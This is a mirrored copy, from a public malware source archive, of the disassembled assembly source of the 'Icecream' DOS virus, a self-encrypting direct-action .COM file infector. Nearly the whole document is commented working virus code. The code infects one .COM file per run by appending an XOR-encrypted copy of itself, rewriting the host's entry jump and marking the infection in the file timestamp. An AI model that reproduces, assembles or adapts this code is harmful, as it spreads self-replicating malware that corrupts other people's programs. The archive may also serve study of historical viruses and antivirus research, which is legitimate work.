mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
260 lines
6.2 KiB
NASM
260 lines
6.2 KiB
NASM
|
;Icecream Virus by the TridenT virus research group.
|
||
|
|
||
|
;This is a simple direct-action com virus that uses one of
|
||
|
;4 encryption algorithms to encrypt itself each time it infects a file.
|
||
|
;It will infect one .COM file in the current directory every time it is
|
||
|
;executed. It marks infections with the time stamp.
|
||
|
|
||
|
|
||
|
;Disassembly by Black Wolf
|
||
|
|
||
|
.model tiny
|
||
|
.code
|
||
|
org 100h
|
||
|
|
||
|
start:
|
||
|
db 0e9h,0ch,0 ;jmp Virus_Entry
|
||
|
|
||
|
Author_Name db 'John Tardy'
|
||
|
|
||
|
db 0E2h,0FAh
|
||
|
Virus_Entry:
|
||
|
push ax
|
||
|
call Get_Offset
|
||
|
Get_Offset:
|
||
|
pop ax
|
||
|
sub ax,offset Get_Offset
|
||
|
|
||
|
db 89h,0c5h ;mov bp,ax
|
||
|
lea si,[bp+Storage]
|
||
|
mov di,100h ;Restore file
|
||
|
movsw
|
||
|
movsb
|
||
|
|
||
|
mov ah,1Ah
|
||
|
mov dx,0f900h
|
||
|
int 21h ;Set DTA
|
||
|
|
||
|
mov ah,4Eh
|
||
|
|
||
|
FindFirstNext:
|
||
|
lea dx,[bp+ComMask]
|
||
|
xor cx,cx
|
||
|
int 21h ;Find File
|
||
|
jnc InfectFile
|
||
|
|
||
|
Restore_DTA:
|
||
|
mov ah,1Ah
|
||
|
mov dx,80h
|
||
|
int 21h ;Set DTA to default
|
||
|
|
||
|
mov bx,offset start
|
||
|
pop ax ;Return to host
|
||
|
push bx
|
||
|
retn
|
||
|
|
||
|
InfectFile:
|
||
|
mov ax,4300h
|
||
|
mov dx,0f91eh
|
||
|
int 21h ;Get file attribs
|
||
|
|
||
|
push cx ;save 'em
|
||
|
mov ax,4301h
|
||
|
xor cx,cx
|
||
|
int 21h ;Set them to 0
|
||
|
|
||
|
mov ax,3D02h
|
||
|
int 21h ;Open file
|
||
|
|
||
|
mov bx,5700h
|
||
|
xchg ax,bx
|
||
|
int 21h ;Get file time
|
||
|
|
||
|
push cx
|
||
|
push dx ;save it
|
||
|
and cx,1Fh
|
||
|
cmp cx,1 ;check for infection
|
||
|
jne ContinueInfection
|
||
|
db 0e9h,69h,0 ;jmp DoneInfect
|
||
|
|
||
|
ContinueInfection:
|
||
|
mov ah,3Fh
|
||
|
lea dx,[bp+Storage]
|
||
|
mov cx,3
|
||
|
int 21h ;Read in first 3 bytes
|
||
|
|
||
|
mov ax,cs:[Storage+bp]
|
||
|
cmp ax,4D5Ah ;Is it an EXE?
|
||
|
je DoneInfect
|
||
|
cmp ax,5A4Dh
|
||
|
je DoneInfect ;Other EXE signature?
|
||
|
|
||
|
pop dx
|
||
|
pop cx
|
||
|
and cx,0FFE0h ;Change stored time values
|
||
|
or cx,1 ;to mark infection
|
||
|
push cx
|
||
|
push dx
|
||
|
|
||
|
mov ax,4202h ;Go to the end of the file
|
||
|
call Move_FP
|
||
|
sub ax,3
|
||
|
mov cs:[JumpSize+bp],ax ;Save jump size
|
||
|
|
||
|
add ax,10Fh ;Save encryption starting
|
||
|
mov word ptr [bp+EncPtr1+1],ax ;point....
|
||
|
mov word ptr [bp+EncPtr2+1],ax
|
||
|
mov word ptr [bp+EncPtr3+1],ax
|
||
|
mov word ptr [bp+EncPtr4+1],ax
|
||
|
call SetupEncryption ;Encrypt virus
|
||
|
|
||
|
mov ah,40h
|
||
|
mov dx,0fa00h
|
||
|
mov cx,1F5h
|
||
|
int 21h ;Write virus to file
|
||
|
|
||
|
mov ax,4200h
|
||
|
call Move_FP ;Go to the beginning of file
|
||
|
|
||
|
mov ah,40h
|
||
|
lea dx,[bp+JumpBytes]
|
||
|
mov cx,3
|
||
|
int 21h ;Write in jump
|
||
|
|
||
|
call FinishFile
|
||
|
jmp Restore_DTA
|
||
|
|
||
|
DoneInfect:
|
||
|
call FinishFile
|
||
|
mov ah,4Fh
|
||
|
jmp FindFirstNext
|
||
|
|
||
|
Move_FP:
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
int 21h
|
||
|
ret
|
||
|
|
||
|
FinishFile:
|
||
|
pop si dx cx
|
||
|
mov ax,5701h ;Reset file time/date stamp
|
||
|
int 21h ;(or mark infection)
|
||
|
|
||
|
mov ah,3Eh
|
||
|
int 21h ;Close new host file
|
||
|
|
||
|
mov ax,4301h
|
||
|
pop cx
|
||
|
mov dx,0fc1eh
|
||
|
int 21h ;Restore old attributes
|
||
|
|
||
|
push si
|
||
|
retn
|
||
|
|
||
|
Message db ' I scream, you scream, we both '
|
||
|
db 'scream for an ice-cream! '
|
||
|
|
||
|
SetupEncryption:
|
||
|
xor byte ptr [bp+10Dh],2
|
||
|
xor ax,ax
|
||
|
mov es,ax
|
||
|
mov ax,es:[46ch] ;Get random number
|
||
|
push cs
|
||
|
pop es
|
||
|
push ax
|
||
|
and ax,7FFh
|
||
|
add ax,1E9h
|
||
|
mov word ptr [bp+EncSize1+1],ax
|
||
|
mov word ptr [bp+EncSize2+1],ax
|
||
|
mov word ptr [bp+EncSize3+1],ax
|
||
|
mov word ptr [bp+EncSize4+1],ax
|
||
|
pop ax
|
||
|
push ax
|
||
|
and ax,3
|
||
|
shl ax,1
|
||
|
mov si,ax
|
||
|
mov ax,[bp+si+EncData1]
|
||
|
add ax,bp
|
||
|
mov si,ax
|
||
|
lea di,[bp+103h]
|
||
|
movsw
|
||
|
movsw
|
||
|
movsw
|
||
|
movsw ;Copy Encryption Algorithm
|
||
|
pop ax
|
||
|
stosb
|
||
|
movsb
|
||
|
mov dl,al
|
||
|
lea si,[bp+103h]
|
||
|
mov di,0fa00h
|
||
|
mov cx,0Ch
|
||
|
rep movsb
|
||
|
lea si,[bp+10Fh]
|
||
|
mov cx,1E9h
|
||
|
|
||
|
EncryptVirus:
|
||
|
lodsb
|
||
|
db 30h,0d0h ;xor al,dl
|
||
|
stosb
|
||
|
loop EncryptVirus
|
||
|
|
||
|
cmp dl,0
|
||
|
je KeyWasZero
|
||
|
retn
|
||
|
|
||
|
KeyWasZero: ;If key is zero, increase
|
||
|
mov si,offset AuthorName ;jump size and place name
|
||
|
mov di,0fa00h ;at beginning....
|
||
|
mov cx,0Ah
|
||
|
rep movsb
|
||
|
mov ax,cs:[JumpSize+bp]
|
||
|
add ax,0Ch
|
||
|
mov cs:[JumpSize+bp],ax
|
||
|
retn
|
||
|
|
||
|
db '[TridenT]'
|
||
|
|
||
|
EncData1 dw 02beh
|
||
|
EncData2 dw 02c7h
|
||
|
EncData3 dw 02d0h
|
||
|
EncData4 dw 02d9h
|
||
|
|
||
|
Encryptions:
|
||
|
;------------------------------------------------------------
|
||
|
EncPtr1:
|
||
|
mov si,0
|
||
|
EncSize1:
|
||
|
mov cx,0
|
||
|
xor byte ptr [si],46h
|
||
|
;------------------------------------------------------------
|
||
|
EncPtr2:
|
||
|
mov di,0
|
||
|
EncSize2:
|
||
|
mov cx,0
|
||
|
xor byte ptr [di],47h
|
||
|
;------------------------------------------------------------
|
||
|
EncSize3:
|
||
|
mov cx,0
|
||
|
EncPtr3:
|
||
|
mov si,0
|
||
|
xor byte ptr [si],46h
|
||
|
;------------------------------------------------------------
|
||
|
EncSize4:
|
||
|
mov cx,0
|
||
|
EncPtr4:
|
||
|
mov di,0
|
||
|
xor byte ptr [di],47h
|
||
|
;------------------------------------------------------------
|
||
|
|
||
|
AuthorName db 'John Tardy'
|
||
|
|
||
|
JumpBytes db 0E9h
|
||
|
JumpSize dw 0
|
||
|
|
||
|
ComMask db '*.CoM',0
|
||
|
|
||
|
Storage dw 20CDh
|
||
|
db 21h
|
||
|
|
||
|
end start
|